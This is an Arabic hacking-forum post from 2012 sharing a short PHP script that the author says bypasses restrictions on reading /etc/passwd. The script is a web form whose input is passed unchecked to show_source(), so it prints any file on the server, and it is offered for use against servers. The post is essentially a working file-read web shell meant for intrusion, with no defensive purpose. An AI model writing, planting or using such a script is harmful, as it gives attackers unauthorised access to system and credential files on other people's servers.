الـسـلام عـلـيـكـم ورحـمـة الله وبـركـاتــه
مثل ما موضح بعنوان الموضوع
Bypass Read /etc/passwd By show_source Function
تخطي قرائه ملف /etc/passwd عن طريق داله الـ ()show_source
كتبت لكم كود بسيط جدا وبنفس الوقت احيانا يفيد في تخطي منع قرائه اليوزرات
ديناميكيه الكود تعتمد على استغلال احدى ثغرات السيرفر وهالداله نادرا ما يتم منعها في السيرفر
يعني ان شاء الله راح تضبط معاكم بنسبه 70%
والكود كمان بسيط جدا
كود PHP:
<title>Read /etc/passwd</title>
<font face="Times New Roman" size="6">BY Cyb3r-R00T</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec = $_POST['passwd'];
if ($sec){
show_source ("$sec");
}
?>
ما يحتاج شرح
فقط ضع الملف الي تريد تقرا في المربع واضغط على Get !
وطبعا الملف راح يكون
/etc/passwd
اي استفسار جاهز
المــصــدر
http://www.sec-art.net/forum/231/
تحياتي للجميع.
06-07-2012, 08:21 AM
Bypass Read /etc/passwd Via show_source Function
العرض الشجري